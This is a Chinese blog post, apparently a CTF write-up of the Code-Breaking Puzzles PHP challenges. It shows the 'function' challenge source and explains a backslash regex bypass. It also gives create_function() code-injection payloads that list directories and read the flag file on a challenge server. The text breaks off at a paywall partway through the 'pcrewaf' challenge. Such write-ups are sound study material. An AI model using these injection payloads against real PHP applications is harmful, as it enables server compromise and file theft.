代码审计Code-Breaking Puzzles学习记录

最新推荐文章于 2022-02-06 02:03:46 发布
最新推荐文章于 2022-02-06 02:03:46 发布
阅读量771 收藏
点赞数
分类专栏: write up PHP审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41725312/article/details/84978944
版权

文章目录

前言

Code-Breaking Puzzles是一场完全开放源代码的Web解密游戏,其包含但不限于PHP、Java、Node.js、Python等语言的代码审计知识。
p师傅的知识星球真是干货多多,刚刚加入就遇到这个,赶忙的学习了一波.

function PHP函数利用技巧
pcrewaf PHP正则特性
phpmagic PHP写文件技巧
phplimit PHP代码执行限制绕过

easy - function

<?php
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';

if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
   
    show_source(__FILE__);
} else {
   
    $action('', $arg);
}
  • 先看正则表达式,用了3个模式修饰符,
    i:大小写不敏感
    s:.要匹配换行符
    D:$要匹配换行符
    匹配了以字母数字或下划线的字符串的,我们需要在开头或结尾加入某个字符来绕过正则且函数依然能调用

php里默认命名空间是,所有原生函数和类都在这个命名空间中。普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写function_name() 这样调用函数,则其实是写了一个绝对路径。如果你在其他namespace里调用系统类,就必须写绝对路径这种写法。

所以可以通过function_name这样的形式绕过正则

  • 我们可以控制函数的第二个参数$arg,需要某个函数的第二个参数比较危险

PHP create_function()代码注入

payload

遍历目录

?action=create_function&arg=return 1;}var_dump(glob("/var/www/*"));//


http://51.158.75.42:8087/?action=create_function&arg=return 1;}var_dump(scandir("/var/www/"));//


获取flag

?action=create_function&arg=return 1;}readfile("/var/www/flag_h0w2execute_arb1trary_c0de");//

easy - pcrewaf

<?php
function is_php($data){
    return preg_match('/<?.*[(`;'?>'].*/is', $data);
}
if(empty($_FILES)) {
    die(show_source(__FILE__));
}

$user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR']);
$data = file_get_contents($_FILES['file']['tmp_name']);
if (is_php($data)) {
    echo "bad request";
} else {
    @mkdir($user_dir, 0755);
    $path = $user_dir . '/' . random_int(0, 10) . '.php';
    move_uploaded_file($_FILES[&#
最低0.47元/天 解锁文章
酉酉囧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java安全学习-Code-Breaking Puzzles-javacon详细分析
蚁景网安学院
10-17 467
0x01.前言最近在学习java安全,正好Code-Breaking系列有一道java代码审计相关的题目,这里详细分析一下这道题目,希望能和师傅们共同进步~0x02.环境准备需要反编译...
复现 Code-Breaking Puzzles 记录
观樂。的博客
01-11 901
题目地址:Code-Breaking Puzzle 当时一道题也没做出来,然后12月初的时候看着其他大佬们的Writeup复现了一波,但也没写Writeup,于是这一拖再拖,成功地拖过了一年,希望在今年开个好头,而且p牛的环境还没关(感谢p牛!),还有得救,趁机把它补上记录一下。 easy - function &amp;amp;amp;amp;amp;lt;?php $action = $_GET['action'] ?? ''; $...
Code-Breaking Puzzles 2018
D.MIND 的博客
08-04 359
翻翻P神2018年整的代码题来做做… 文章目录function——`create_funciton()`的代码执行pcrewaf——PCRE正则匹配回溯phpmagicphplimit——无参数文件读取nodechr function——create_funciton()的代码执行 <?php $action = $_GET['action'] ?? ''; $arg = $_GET['arg'] ?? ''; if(preg_match('/^[a-z0-9_]*$/isD', $action))
Code-Breaking Puzzles做题记录
XL115715453的博客
12-27 296
文章首发于先知社区:https://xz.aliyun.com/t/3623 Code-Breaking Puzzles传送门:https://code-breaking.com function PHP函数利用技巧 pcrewaf PHP正则特性 phpmagic PHP写文件技巧 phplimit PHP代码执行限制绕过 nodechr Javascript字符串...
java con_java安全学习-Code-Breaking Puzzles-javacon详细分析
weixin_29782509的博客
02-21 334
本文首发于合天智汇:https://mp.weixin.qq.com/s/XWpe3OGwH1d9dYNMqfnyzA0x01.环境准备需要反编译的jar包如下所示直接通过以下步骤将jar文件导入到idea中,就可以获得源码文件如下所示我们就可以获得反编译后的几个重要的类和一些配置文件0x02.题目分析主要的逻辑在MainController类中@GetMappingpublic String a...
Advent-Of-Code-Puzzles
04-04
在这个名为"Advent-Of-Code-Puzzles"的代码仓库中,我们可以看到作者用来解决AoC谜题的Python代码。 Python作为一门流行的高级编程语言,因其简洁明了的语法和强大的库支持,成为了解决这类问题的理想选择。在AoC的...
code-puzzles
03-22
本文将以“code-puzzles”为主题,探讨一系列基于C语言的代码难题,旨在帮助读者深化对C语言的理解,提升编程技能。 C语言作为一门经典且强大的系统级编程语言,其简洁的语法和底层控制能力深受程序员喜爱。然而,...
行业教育软件-学习软件-Animated Puzzles2 1.0 英文版.zip
08-01
《 Animated Puzzles2 1.0 英文版:一款创新的行业教育与学习工具》 在数字化时代,教育软件已经成为辅助学习、提升教学效果的重要工具。"Animated Puzzles2 1.0 英文版"就是这样一款专为行业教育和学习设计的软件...
行业教育软件-学习软件-Animated Puzzles3 1.0 英文版.zip
08-01
《 Animated Puzzles3 1.0 英文版:一款创新的行业教育与学习工具》 在数字化时代,教育软件已经成为辅助学习、提升教学效果的重要工具。"Animated Puzzles3 1.0 英文版"就是这样一款专为行业教育和学习设计的软件...
code-puzzles:编程挑战与算法
04-07
标题中的"code-puzzles:编程挑战与算法"揭示了这个资源主要关注的是通过编程解决难题和算法的实践。在计算机科学(CS)领域,算法是解决问题的核心工具,而编程则是实现这些算法的方式。这个仓库可能包含了一系列...
Code-Breaking Puzzles 做题记录
fnmsd的博客
11-28 3646
Code-Breaking Puzzles Writeup 代码审计圈子里看到Code-Breaking Puzzles,跟着学习着做下。 地址:https://code-breaking.com/ 给P神的代码审计圈子打个广告,199元你买不了吃亏买不了上当: easy - pcrewaf 这个题最开始做上来的,但是做出来了个非预期解。 最开始的题目: &amp;amp;amp;amp;amp;lt;?php function is...
Code-Breaking Puzzles easy - function(匿名函数利用)
烟敛寒林的博客
05-09 881
题目地址:http://120.78.164.84:49001/ <?php $action = $_GET['action'] ?? ''; $arg = $_GET['arg'] ?? ''; if(preg_match('/^[a-z0-9_]*$/isD', $action)) { show_source(__FILE__); } else { $action(...
Code-Breaking 2018 Thejs(代码审计
qq_53460654的博客
02-06 1373
由于没找到环境,我这里只是为了学习这个知识点,所以找源码来分析一下 源码:https://github.com/phith0n/code-breaking/tree/master/2018/thejs const fs = require('fs') const express = require('express') const bodyParser = require('body-parser') const lodash = require('lodash') const session = requ
PHP - 代码执行 - create_function()
3569
11-29 1736
https://paper.seebug.org/94/ create_function() 大致流程如下 1. 获取参数, 函数体; 2. 拼凑一个”function __lambda_func (参数) { 函数体;} “的字符串; 3. eval; 4. 通过__lambda_func在函数表中找到eval后得到的函数体, 找不到就出错; 5. 定义一个函数名:”\000_la...
p神 代码审计知识星球二周年wp[1]
weixin_34372728的博客
11-27 2009
题目:https://code-breaking.com 参考文献:https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.htmlhttps://blog.csdn.net/while0/artic...
p神 代码审计知识星球二周年wp[2]
weixin_33852020的博客
12-05 771
参考文献:https://m3lon.github.io/2018/05/29/RCTF-r-cursive-wp/http://f1sh.site/2018/11/25/code-breaking-puzzles%e5%81%9a%e9%a2%98%e8%ae%b0%e5%bd%95/ 递归匹配:http:...
PHP代码审计之基础篇
热门推荐
Mi1k7ea
04-18 1万+
最近在学PHP代码审计,那就将学习的笔记都整理一遍吧~ 前期准备: 1、安装相关软件,如Sublime text、 Notepad++、editplus、 Seay源代码审计系统等 2、获得源码,可以到网上下载各种网站源码 3、安装网站 审计方法: 通读全文法:麻烦但全面 敏感函数参数回溯法:高效常用,Seay源代码审计系统 定向功能分析法:主要根据程序的业
代码审计从入门到放弃(一) & function
蚁景网安学院
03-07 518
前言题目概述漏洞点思考字符fuzzgetshell函数寻找getflag相关实验操作小结 前言CodeBreaking是ph牛搭建的代码审计挑战赛:https://code-...
Burp Post、Get数据包转为上传multipart/form-data格式数据包
05-11 2163
Burp Post、Get数据包转为上传multipart/form-data格式数据包 方法一: 新建一个网页进行上传,代码代码如下: &lt;html&gt; &lt;head&gt;&lt;/head&gt; &lt;body&gt; &lt;form method="post" enctype="multipart/form...
Webster's Chinese Traditional to English Crossword Puzzles for ESL Learning
这篇摘要介绍的是一本专门设计给学习英语的中文使用者的填字游戏书——"Webster's Chinese Traditional to English Crossword Puzzles_ Level 3-"。这本书主要针对的是ESL(英语作为第二语言)、ELP(英语语言项目)...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值